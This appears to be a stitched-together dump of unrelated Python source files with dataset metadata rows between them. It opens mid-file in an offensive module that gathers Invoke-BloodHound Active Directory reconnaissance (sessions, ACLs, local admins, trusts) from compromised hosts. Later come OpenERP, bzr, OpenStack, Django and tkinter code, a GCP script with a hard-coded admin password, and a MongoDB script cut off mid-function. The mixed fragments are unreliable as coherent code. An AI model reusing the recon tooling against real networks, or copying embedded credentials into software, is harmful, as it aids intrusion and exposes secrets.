response.stop_tracking_host()
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
self.parse_ouput(data, context, response)
context.log.success("Successfully retreived data")
def parse_ouput(self, data, context, response):
'''
Parse the output from Invoke-BloodHound
'''
parsedData = data.split("!-!")
nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv']
for x in range(0, len(parsedData)):
if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name)) | bsd-2-clause | -7,558,939,601,482,193,000 | 54.482759 | 196 | 0.605905 | false | 3.527961 | false | false | false |
avanzosc/avanzosc6.1 | avanzosc_product_category_ext/product_category_ext.py | 1 | 2095 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (http://tiny.be). All Rights Reserved
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from osv import osv
from osv import fields
#
### HEREDO LA PRODUCTOS PARA AÑADIRLE CAMPOS NUEVOS
#
class product_category(osv.osv):
_name = 'product.category'
_inherit = 'product.category'
_columns = {'provision_type': fields.selection([('product','Stockable Product'),('consu', 'Consumable'),('service','Service')], 'Product Type', required=True, help="Will change the way procurements are processed. Consumable are product where you don't manage stock."),
'procure_method': fields.selection([('make_to_stock','Make to Stock'),('make_to_order','Make to Order')], 'Procurement Method', required=True, help="'Make to Stock': When needed, take from the stock or wait until re-supplying. 'Make to Order': When needed, purchase or produce for the procurement request."),
'supply_method': fields.selection([('produce','Produce'),('buy','Buy')], 'Supply method', required=True, help="Produce will generate production order or tasks, according to the product type. Buy will trigger purchase orders when requested."),
}
product_category()
| agpl-3.0 | 7,922,507,221,663,516,000 | 52.692308 | 324 | 0.644222 | false | 4.335404 | false | false | false |
anderdl/test3repo | scripts/releaser_hooks.py | 5 | 2587 | import subprocess
import os
import polib
import copy
import codecs
def prereleaser_middle(data):
"""
1. Run the unit tests one last time before we make a release.
2. Update the CONTRIBUTORS.txt file.
Note: Install polib (https://pypi.python.org/pypi/polib).
"""
print('Running unit tests.')
subprocess.check_output(["python", "example_project/manage.py", "test", "photologue"])
print('Running PEP8 check.')
# See setup.cfg for configuration options.
subprocess.check_output(["pep8"])
print('Updating CONTRIBUTORS.txt')
# This command will get the author of every commit.
output = subprocess.check_output(["git", "log", "--format='%aN'"])
# Convert to a list.
contributors_list = [unicode(contributor.strip("'"), 'utf-8')
for contributor in output.split("\n")]
# Now add info from the translator files. This is incomplete, we can only list
# the 'last contributor' to each translation.
for language in os.listdir('photologue/locale/'):
filename = 'photologue/locale/{0}/LC_MESSAGES/django.po'.format(language)
po = polib.pofile(filename)
last_translator = po.metadata['Last-Translator']
contributors_list.append(last_translator[:last_translator.find('<') - 1])
# Now we want to only show each contributor once, and to list them by how many
# contributions they have made - a rough guide to the effort they have put in.
contributors_dict = {}
for author in contributors_list:
author_copy = copy.copy(author)
if author_copy in ('', '(no author)', 'FULL NAME'):
# Skip bad data.
continue
# The creator of this project should always appear first in the list - so
# don't add him to this list, but hard-code his name.
if author_copy in ('Justin Driscoll', 'justin.driscoll'):
continue
# Handle contributors who appear under multiple names.
if author_copy == 'richardbarran':
author_copy = 'Richard Barran'
if author_copy in contributors_dict:
contributors_dict[author_copy] += 1
else:
contributors_dict[author_copy] = 1
with codecs.open('CONTRIBUTORS.txt', 'w', encoding='utf8') as f:
f.write('Photologue is made possible by all the people who have contributed'
' to it. A non-exhaustive list follows:\n\n')
f.write('Justin Driscoll\n')
for i in sorted(contributors_dict, key=contributors_dict.get, reverse=True):
f.write(i + '\n')
| bsd-3-clause | -3,137,737,663,403,263,500 | 35.957143 | 90 | 0.638964 | false | 4.004644 | false | false | false |
lenin/bzr-xmloutput | infoxml.py | 1 | 11232 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (C) 2007-2009 Guillermo Gonzalez
#
# The code taken from bzrlib is under: Copyright (C) 2005-2007 Canonical Ltd
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
#
# Contributors:
# Martin Albisetti
"""This code is a modified copy from bzrlib.info (see there for copyrights and
licensing)
"""
__all__ = ['show_bzrdir_info_xml']
from bzrlib import info
from bzrlib.lazy_import import lazy_import
lazy_import(globals(), """
import os, sys, time
from bzrlib import (
bzrdir,
diff,
errors,
osutils,
urlutils,
missing,
)
""")
from bzrlib.errors import (NoWorkingTree, NotBranchError,
NoRepositoryPresent, NotLocalUrl)
def get_lines_xml(self):
"""Returns the locations lines as xml."""
return ["<%s>%s</%s>" % (l.replace(' ', '_'), u, l.replace(' ', '_')) \
for l, u in self.locs ]
info.LocationList.get_lines_xml = get_lines_xml
def show_bzrdir_info_xml(a_bzrdir, verbose=False, outfile=None):
"""Output to stdout the 'info' for a_bzrdir."""
if outfile is None:
outfile = sys.stdout
try:
tree = a_bzrdir.open_workingtree(
recommend_upgrade=False)
except (NoWorkingTree, NotLocalUrl):
tree = None
try:
branch = a_bzrdir.open_branch()
except NotBranchError:
branch = None
try:
repository = a_bzrdir.open_repository()
except NoRepositoryPresent:
# Return silently; cmd_info already returned NotBranchError
# if no bzrdir could be opened.
return
else:
lockable = repository
else:
repository = branch.repository
lockable = branch
else:
branch = tree.branch
repository = branch.repository
lockable = tree
lockable.lock_read()
try:
outfile.write('<?xml version="1.0"?>')
outfile.write('<info>')
show_component_info_xml(a_bzrdir, repository, branch, tree, verbose,
outfile)
outfile.write('</info>')
finally:
lockable.unlock()
def show_component_info_xml(control, repository, branch=None,
working=None, verbose=1, outfile=None):
"""Write info about all bzrdir components to stdout"""
if outfile is None:
outfile = sys.stdout
if verbose is False:
verbose = 1
if verbose is True:
verbose = 2
layout = info.describe_layout(repository, branch, working, control)
formats = info.describe_format(control, repository,
branch, working).split(' or ')
outfile.write('<layout>%s</layout>' % layout)
outfile.write('<formats>')
if len(formats) > 1:
for format in formats:
outfile.write('<format>%s</format>' % format)
else:
outfile.write('<format>%s</format>' % formats[0])
outfile.write('</formats>')
_show_location_info_xml(info.gather_location_info(repository, branch,
working), outfile)
if branch is not None:
_show_related_info_xml(branch, outfile)
if verbose == 0:
return
_show_format_info_xml(control, repository, branch, working, outfile)
_show_locking_info_xml(repository, branch, working, outfile)
if branch is not None:
_show_missing_revisions_branch_xml(branch, outfile)
if working is not None:
_show_working_stats_xml(working, outfile)
elif branch is not None:
_show_missing_revisions_branch_xml(branch, outfile)
if branch is not None:
stats = _show_branch_stats_xml(branch, verbose==2, outfile)
else:
stats = repository.gather_stats()
if branch is None and working is None:
_show_repository_info_xml(repository, outfile)
_show_repository_stats_xml(stats, outfile)
def _show_location_info_xml(locs, outfile):
"""Show known locations for working, branch and repository."""
outfile.write('<location>')
path_list = info.LocationList(osutils.getcwd())
for name, loc in locs:
path_list.add_url(name, loc)
outfile.writelines(path_list.get_lines_xml())
outfile.write('</location>')
def _show_related_info_xml(branch, outfile):
"""Show parent and push location of branch."""
locs = info._gather_related_branches(branch)
if len(locs.locs) > 0:
outfile.write('<related_branches>')
outfile.writelines(locs.get_lines_xml())
outfile.write('</related_branches>')
def _show_format_info_xml(control=None, repository=None,
branch=None, working=None, outfile=None):
"""Show known formats for control, working, branch and repository."""
outfile.write('<format>')
if control:
outfile.write('<control>%s</control>' %
control._format.get_format_description())
if working:
outfile.write('<working_tree>%s</working_tree>' %
working._format.get_format_description())
if branch:
outfile.write('<branch>%s</branch>' %
branch._format.get_format_description())
if repository:
outfile.write('<repository>%s</repository>' %
repository._format.get_format_description())
outfile.write('</format>')
def _show_locking_info_xml(repository, branch=None, working=None, outfile=None):
"""Show locking status of working, branch and repository."""
if (repository.get_physical_lock_status() or
(branch and branch.get_physical_lock_status()) or
(working and working.get_physical_lock_status())):
outfile.write('<lock_status>')
if working:
if working.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
outfile.write('<working_tree>%s</<working_tree>' % status)
if branch:
if branch.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
outfile.write('<branch>%s</branch>' % status)
if repository:
if repository.get_physical_lock_status():
status = 'locked'
else:
status = 'unlocked'
outfile.write('<repository>%s</repository>' % status)
outfile.write('</lock_status>')
def _show_missing_revisions_branch_xml(branch, outfile):
"""Show missing master revisions in branch."""
# Try with inaccessible branch ?
master = branch.get_master_branch()
if master:
local_extra, remote_extra = missing.find_unmerged(branch, master)
if remote_extra:
outfile.write('<branch_stats>')
outfile.write('<missing_revisions>%d<missing_revisions>' %
len(remote_extra))
outfile.write('</branch_stats>')
def _show_missing_revisions_working_xml(working, outfile):
"""Show missing revisions in working tree."""
branch = working.branch
basis = working.basis_tree()
branch_revno, branch_last_revision = branch.last_revision_info()
try:
tree_last_id = working.get_parent_ids()[0]
except IndexError:
tree_last_id = None
if branch_revno and tree_last_id != branch_last_revision:
tree_last_revno = branch.revision_id_to_revno(tree_last_id)
missing_count = branch_revno - tree_last_revno
outfile.write('<missing_revisions>%d</missing_revisions>' %
missing_count)
def _show_working_stats_xml(working, outfile):
"""Show statistics about a working tree."""
basis = working.basis_tree()
delta = working.changes_from(basis, want_unchanged=True)
outfile.write('<working_tree_stats>')
_show_missing_revisions_working_xml(working, outfile)
outfile.write('<unchanged>%s</unchanged>' % len(delta.unchanged))
outfile.write('<modified>%d</modified>' % len(delta.modified))
outfile.write('<added>%d</added>' % len(delta.added))
outfile.write('<removed>%d</removed>' % len(delta.removed))
outfile.write('<renamed>%d</renamed>' % len(delta.renamed))
ignore_cnt = unknown_cnt = 0
for path in working.extras():
if working.is_ignored(path):
ignore_cnt += 1
else:
unknown_cnt += 1
outfile.write('<unknown>%d</unknown>' % unknown_cnt)
outfile.write('<ignored>%d</ignored>' % ignore_cnt)
dir_cnt = 0
for path, entry in working.iter_entries_by_dir():
if entry.kind == 'directory' and entry.parent_id is not None:
dir_cnt += 1
outfile.write('<versioned_subdirectories>%d</versioned_subdirectories>' %
(dir_cnt))
outfile.write('</working_tree_stats>')
def _show_branch_stats_xml(branch, verbose, outfile):
"""Show statistics about a branch."""
revno, head = branch.last_revision_info()
outfile.write('<branch_history>')
outfile.write('<revisions>%d</revisions>' % (revno))
stats = branch.repository.gather_stats(head, committers=verbose)
if verbose:
committers = stats['committers']
outfile.write('<committers>%d</committers>' % (committers))
if revno:
timestamp, timezone = stats['firstrev']
age = int((time.time() - timestamp) / 3600 / 24)
outfile.write('<days_old>%d</days_old>' % (age))
outfile.write('<first_revision>%s</first_revision>' % \
osutils.format_date(timestamp, timezone))
timestamp, timezone = stats['latestrev']
outfile.write('<latest_revision>%s</latest_revision>' % \
osutils.format_date(timestamp, timezone))
outfile.write('</branch_history>')
return stats
def _show_repository_info_xml(repository, outfile):
"""Show settings of a repository."""
## FIXME/TODO: is this needed in the xml output?
#if repository.make_working_trees():
# print 'Create working tree for new branches inside the repository.'
def _show_repository_stats_xml(stats, outfile):
"""Show statistics about a repository."""
if 'revisions' in stats or 'size' in stats:
outfile.write('<repository_stats>')
if 'revisions' in stats:
revisions = stats['revisions']
outfile.write('<revisions>%d</revisions>' % (revisions))
if 'size' in stats:
outfile.write('<size unit="KiB">%d</size>' % (stats['size']/1024))
if 'revisions' in stats or 'size' in stats:
outfile.write('</repository_stats>')
| gpl-2.0 | -8,681,474,784,516,593,000 | 36.069307 | 80 | 0.61948 | false | 3.99431 | false | false | false |
brampling/infoblox-gcp-poc | delete_subnet.py | 1 | 1501 | #!/usr/bin/python
import gcloudutils
import sys
import requests
import argparse
from infoblox_client import connector
from infoblox_client import objects
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from oauth2client.client import GoogleCredentials
from googleapiclient import discovery
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
credentials = GoogleCredentials.get_application_default()
compute = discovery.build('compute', 'v1', credentials=credentials)
parser = argparse.ArgumentParser(
description='Create a number of VMs in Google Compute Engine. Google Cloud SDK must be installed and configured (gcloud init) and google-api-python-client and infoblox-client Python libraries must be installed.')
parser.add_argument('name', nargs='+', help='List of FQDNs for VMs to delete separated by spaces')
args=parser.parse_args()
niosip = '10.60.27.4'
niosuser = 'admin'
niospw = 'infoblox'
project='mythic-brook-146218'
zone='us-west1-a'
#name = args.name
splitzone = zone.split('-',2)
region = splitzone[0] + '-' + splitzone[1]
opts = {'host': niosip, 'username': niosuser, 'password': niospw}
conn = connector.Connector(opts)
for name in args.name:
gotnet = gcloudutils.get_subnet(compute, project, region, name)
addr = gotnet['ipCidrRange']
gcloudutils.delete_subnet(compute, project, region, name)
netobj = objects.Network.search(conn, cidr=addr)
netdelete = objects.Network.delete(netobj)
| apache-2.0 | 3,885,868,715,293,898,000 | 37.487179 | 220 | 0.781479 | false | 3.458525 | false | false | false |
aristanetworks/arista-ovs-quantum | quantum/tests/unit/nicira/test_nicira_plugin.py | 3 | 2339 | # Copyright (c) 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import quantum.common.test_lib as test_lib
from quantum.tests.unit.nicira import fake_nvpapiclient
import quantum.tests.unit.test_db_plugin as test_plugin
NICIRA_PKG_PATH = 'quantum.plugins.nicira.nicira_nvp_plugin'
class NiciraPluginV2TestCase(test_plugin.QuantumDbPluginV2TestCase):
_plugin_name = ('%s.QuantumPlugin.NvpPluginV2' % NICIRA_PKG_PATH)
def setUp(self):
etc_path = os.path.join(os.path.dirname(__file__), 'etc')
test_lib.test_config['config_files'] = [os.path.join(etc_path,
'nvp.ini.test')]
# mock nvp api client
self.fc = fake_nvpapiclient.FakeClient(etc_path)
self.mock_nvpapi = mock.patch('%s.NvpApiClient.NVPApiHelper'
% NICIRA_PKG_PATH, autospec=True)
instance = self.mock_nvpapi.start()
instance.return_value.login.return_value = "the_cookie"
def _fake_request(*args, **kwargs):
return self.fc.fake_request(*args, **kwargs)
instance.return_value.request.side_effect = _fake_request
super(NiciraPluginV2TestCase, self).setUp(self._plugin_name)
def tearDown(self):
self.fc.reset_all()
super(NiciraPluginV2TestCase, self).tearDown()
self.mock_nvpapi.stop()
class TestNiciraBasicGet(test_plugin.TestBasicGet, NiciraPluginV2TestCase):
pass
class TestNiciraV2HTTPResponse(test_plugin.TestV2HTTPResponse,
NiciraPluginV2TestCase):
pass
class TestNiciraPortsV2(test_plugin.TestPortsV2, NiciraPluginV2TestCase):
pass
class TestNiciraNetworksV2(test_plugin.TestNetworksV2,
NiciraPluginV2TestCase):
pass
| apache-2.0 | 9,094,450,046,732,250,000 | 32.898551 | 77 | 0.678923 | false | 3.512012 | true | false | false |
nexus511/gpd-ubuntu-packages | packages/gpdpocket-power/make.py | 1 | 2841 | import shutil
import subprocess
import os
import tarfile
class Config(object):
build = os.path.abspath("build")
files = os.path.abspath("files")
output = os.path.abspath("output")
manifest = os.path.abspath("build/DEBIAN")
temp = os.path.abspath("tmp")
templates = os.path.abspath("files/DEBIAN")
version = "0.1.0"
variables = {
"architecture": "all",
"maintainer": "Falk Garbsch <[email protected]>",
"name": "gpdpocket-power",
}
print "first we cleanup our stuff"
config = Config()
for rdir in [config.build, config.temp, config.output]:
try:
print ">> remove %s" % (rdir)
shutil.rmtree(rdir)
except:
pass
print "create directories"
os.makedirs(config.temp)
os.makedirs(config.output)
os.makedirs(config.build)
os.makedirs(config.manifest)
print "copy files"
copylist = [
( 'files/gpd-fan.conf', '/etc/gpd/fan.conf', 0644 ),
( 'files/gpd-fan.py', '/usr/local/sbin/gpd-fan', 0755 ),
( 'files/gpd-fan.service', '/etc/systemd/system/gpd-fan.service', 0644 ),
( 'files/gpd-fan.sh', '/lib/systemd/system-sleep/gpd-fan', 0755 ),
( 'files/tlp', '/etc/default/tlp', 0644 )
]
for src, dst, mode in copylist:
print ">> copy (0%o) %s" % (mode, dst)
src = os.path.abspath(src)
dst = config.build + dst
dn = os.path.dirname(dst)
if not os.path.isdir(dn):
os.makedirs(dn)
shutil.copy(src, dst)
os.chmod(dst, mode)
print "enable systemd service"
src = "/etc/systemd/system/gpd-fan.service"
dst = config.build + "/etc/systemd/system/basic.target.wants/gpd-fan.service"
dn = os.path.dirname(dst)
if not os.path.exists(dst):
os.makedirs(dn)
os.symlink(src, dst)
print "create blacklist item"
blacklist = config.build + "/etc/pm/config.d/brcmfmac"
dn = os.path.dirname(blacklist)
if not os.path.isdir(dn):
os.makedirs(dn)
fp = open(blacklist, "wb")
fp.write("SUSPEND_MODULES=\"brcmfmac\"\n")
fp.flush()
fp.close()
print "write control"
variables = config.variables
variables["version"] = config.version
control = open(config.files + "/DEBIAN/control", "rb").read()
fp = open(config.manifest + "/control", "wb")
fp.write(control.format(**variables))
fp.flush()
fp.close()
print "constructing script files"
for script in ["/postinst", "/postrm", "/preinst", "/prerm"]:
print ">> write DEBIAN%s" % (script)
filepath = config.manifest + script
content = open(config.templates + script, "rb").read()
fp = open(filepath, "wb")
fp.write(content.replace("__VERSION_CODE__", variables["version"]))
fp.flush()
fp.close()
os.chmod(filepath, 0555)
print "building binary package"
command = ["fakeroot", "dpkg-deb", "-b", config.build]
command.append("%s/%s-%s.deb" % (config.output, variables["name"], variables["version"]))
subprocess.call(command)
print "done"
| gpl-3.0 | 1,494,709,160,688,461,800 | 28.59375 | 89 | 0.655403 | false | 3 | true | false | false |
heynemann/mememe | engine/models.py | 1 | 2443 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Lincoln de Sousa <[email protected]>
# Copyright (C) 2010 Gabriel Falcão <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from glob import glob
from ConfigParser import ConfigParser
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils import simplejson
class Plugin(object):
name = None
description = None
js_url = None
html_url = None
slug = None
default = False
def to_dict(self):
d = {
'name': self.name,
'description': self.description,
'slug': self.slug,
'js_url': self.js_url,
'html_url': self.html_url,
'default': self.default,
}
return d
def to_json(self):
return simplejson.dumps(self.to_dict())
@classmethod
def fetch_all(cls):
plugins = []
files = glob(os.path.join(settings.PLUGINS_DIRECTORY, "*.cfg"))
for i in files:
fname = os.path.splitext(os.path.basename(i))[0]
plugin = cls()
cfg = ConfigParser()
cfg.read(os.path.abspath(i))
plugin.name = cfg.get('Default', 'name')
plugin.slug = fname
plugin.description = cfg.get('Default', 'description')
plugin.js_url = reverse('plugins-url',
kwargs={'path': '%s.js' % fname})
plugin.html_url = reverse('plugins-url',
kwargs={'path': '%s.html' % fname})
if cfg.has_option('Default', 'default'):
plugin.default = cfg.getboolean('Default', 'default')
else:
plugin.default = False
plugins.append(plugin)
return plugins
| agpl-3.0 | 5,188,528,998,554,488,000 | 32.916667 | 74 | 0.604832 | false | 4.043046 | false | false | false |
openstack/rally | rally/common/db/migrations/versions/2017_10_9a18c6fe265c_rename_namespace_to_platform.py | 1 | 1124 | # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Rename Namespace To Platform
Revision ID: 9a18c6fe265c
Revises: 046a38742e89
Create Date: 2017-10-12 17:28:17.636938
"""
from alembic import op
from rally import exceptions
# revision identifiers, used by Alembic.
revision = "9a18c6fe265c"
down_revision = "046a38742e89"
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table("verifiers") as batch_op:
batch_op.alter_column("namespace", new_column_name="platform")
def downgrade():
raise exceptions.DowngradeNotSupported()
| apache-2.0 | 9,216,170,407,023,605,000 | 27.1 | 78 | 0.732206 | false | 3.556962 | false | false | false |
galileo-press/django-lint | django_lint_example/example/models/__init__.py | 4 | 4702 | from django.db import models
from django.contrib import admin
class NullableModel(models.Model):
TRUTH_VALUE = True
charfield = models.CharField(max_length=100, null=True, blank=True)
charfield_2 = models.CharField(max_length=100, null=TRUTH_VALUE)
textfield = models.TextField(null=True, blank=True)
boolean_false = models.BooleanField(default=True)
nullable_boolean = models.NullBooleanField()
# We should still report about the following field, but we cannot
# determine its name.
models.NullBooleanField()
class UniqueForModels(models.Model):
time = models.DateTimeField()
u_date = models.IntegerField(unique_for_date='time')
u_month = models.IntegerField(unique_for_month='time')
u_year = models.IntegerField(unique_for_year='time')
class ParentModel(models.Model):
parent = models.ForeignKey('self')
class StrModel(models.Model):
dummy = models.CharField(max_length=1)
def __str__(self):
return "__str__ method"
def __unicode__(self):
return self.dummy
class NullBlankModel(models.Model):
number = models.IntegerField(blank=True)
class BigModel(models.Model):
field01 = models.IntegerField()
field02 = models.IntegerField()
field03 = models.IntegerField()
field04 = models.IntegerField()
field05 = models.IntegerField()
field06 = models.IntegerField()
field07 = models.IntegerField()
field08 = models.IntegerField()
field09 = models.IntegerField()
field10 = models.IntegerField()
field11 = models.IntegerField()
field12 = models.IntegerField()
field13 = models.IntegerField()
field14 = models.IntegerField()
field15 = models.IntegerField()
field16 = models.IntegerField()
field17 = models.IntegerField()
field18 = models.IntegerField()
field19 = models.IntegerField()
field20 = models.IntegerField()
field21 = models.IntegerField()
field22 = models.IntegerField()
field23 = models.IntegerField()
field24 = models.IntegerField()
field25 = models.IntegerField()
field26 = models.IntegerField()
field27 = models.IntegerField()
field28 = models.IntegerField()
field29 = models.IntegerField()
field30 = models.IntegerField()
field31 = models.IntegerField()
class NoFieldsModel(models.Model):
pass
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.CharField(max_length=1000)
views = models.PositiveSmallIntegerField()
words = models.SmallIntegerField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
class Comment(models.Model):
post = models.ForeignKey(Post)
url = models.URLField()
def __unicode__(self):
return self.url
class MisorderedMethodsModel(models.Model):
dummy = models.CharField(max_length=1)
def incorrect_place(self):
pass
def get_absolute_url(self):
pass
def __unicode__(self):
# This should be swapped with get_absolute_url
pass
def correct_place(self):
pass
class Model1(models.Model):
dummy = models.CharField(max_length=1)
class Meta:
verbose_name_plural = 'right'
def __unicode__(self):
return self.dummy
class Model2(models.Model):
dummy = models.CharField(max_length=1)
def __unicode__(self):
return self.dummy
class Meta:
verbose_name_plural = 'wrong'
class Model3(models.Model):
class Meta:
verbose_name_plural = 'wrong'
dummy = models.CharField(max_length=1)
def __unicode__(self):
return self.dummy
class Model4(models.Model):
dummy = models.CharField(max_length=1)
def __unicode__(self):
return self.dummy
class Model5(models.Model):
dummy = models.CharField(max_length=1)
def get_absolute_url(self):
return "/"
def __unicode__(self):
return self.dummy
class AbstractModel(models.Model):
foo = models.CharField(max_length=1)
class Meta:
abstract = True
class DerivedModel(AbstractModel):
bar = models.CharField(max_length=1)
class WeirdPrimaryKeyModel(models.Model):
primary_key = models.ForeignKey(Model1, primary_key=True)
unique_field = models.ForeignKey(Model2, unique=True)
not_both = models.ForeignKey(Model3, primary_key=True, unique=False)
class ManyToManyModel(models.Model):
nullable = models.ManyToManyField(Model2, null=True)
blank = models.ManyToManyField(Model3, blank=True)
class AdminKlass(admin.ModelAdmin):
search_fields = ('nullable',)
class Meta:
model = ManyToManyModel
| gpl-3.0 | -342,427,899,461,134,600 | 26.022989 | 72 | 0.68439 | false | 3.941324 | false | false | false |
saintdragon2/python-3-lecture-2015 | gui_practice/tkinter_02.py | 1 | 2021 | __author__ = 'saintdragon2'
#http://www.tutorialspoint.com/python/tk_menu.htm
from tkinter import Tk, Menu, Toplevel, Button
from tkinter.filedialog import askopenfilename
from tkinter.messagebox import showerror
def donothing():
filewin = Toplevel(root)
button = Button(filewin, text="Do nothing button")
button.pack()
def load_file():
fname = askopenfilename(filetypes=(("Template files", "*.tplate"),
("HTML files", "*.html;*.htm"),
("All files", "*.*") ))
if fname:
try:
# print("""here it comes: self.settings["template"].set(fname)""")
print(fname)
except: # <- naked except is a bad idea
showerror("Open Source File", "Failed to read file\n'%s'" % fname)
return
root = Tk()
menubar = Menu(root)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='New', command=donothing)
filemenu.add_command(label='Open', command=load_file)
filemenu.add_command(label='Save', command=donothing)
filemenu.add_command(label='Save as ...', command=donothing)
filemenu.add_command(label='Close', command=donothing)
filemenu.add_separator()
filemenu.add_command(label='Exit', command=root.quit)
menubar.add_cascade(label='File', menu=filemenu)
editmenu = Menu(menubar, tearoff=0)
editmenu.add_command(label='Undo', command=donothing)
editmenu.add_separator()
editmenu.add_command(label='Cut', command=donothing)
editmenu.add_command(label='Copy', command=donothing)
editmenu.add_command(label='Paste', command=donothing)
editmenu.add_command(label='Delete', command=donothing)
editmenu.add_command(label='Select All', command=donothing)
menubar.add_cascade(label='Edit', menu=editmenu)
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Help Index', command=donothing)
helpmenu.add_command(label='About ...', command=donothing)
menubar.add_cascade(label='Help', menu=helpmenu)
root.config(menu=menubar)
root.mainloop()
| mit | -443,248,091,811,062,340 | 33.844828 | 78 | 0.683325 | false | 3.324013 | false | false | false |
idl/Tweet_correlation | additional_modules/map_red_user_mongo.py | 1 | 4060 | import simplekml
import json
import datetime
import csv
from bson.code import Code
from pymongo import MongoClient
from math import radians, cos, sin, asin, sqrt
from random import choice
import operator
import csv
def haversine(lon1, lat1, lon2, lat2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
km = 6367 * c
return km
def closest_negighbor(geo_dict):
data = {}
if geo_dict['n_loc'] == 1:
data['user'] = geo_dict['user']
data['loc'] = geo_dict['location'][0]
elif geo_dict['n_loc'] == 2:
data['user'] = geo_dict['user']
data['loc'] = choice(geo_dict['location'])
elif geo_dict['n_loc'] > 2:
pt_dict = {}
for i in range(len(geo_dict['location'])):
distance_list = []
for j in range(len(geo_dict['location'])):
distance = haversine(geo_dict['location'][i][0],geo_dict['location'][i][1],geo_dict['location'][j][0],geo_dict['location'][j][1])
distance_list.append(distance)
pt_dict[i] = reduce(lambda x, y: x + y, distance_list) / len(distance_list)
data['user'] = geo_dict['user']
data['loc'] = geo_dict['location'][max(pt_dict.iteritems(), key=operator.itemgetter(1))[0]]
else:
return data
data['n_loc'] = geo_dict['n_loc']
return data
def map_points(input_file):
geo_stuff = tw_spanish.map_reduce(mapper,reducer, "results")
#print geo_stuff
count = 0
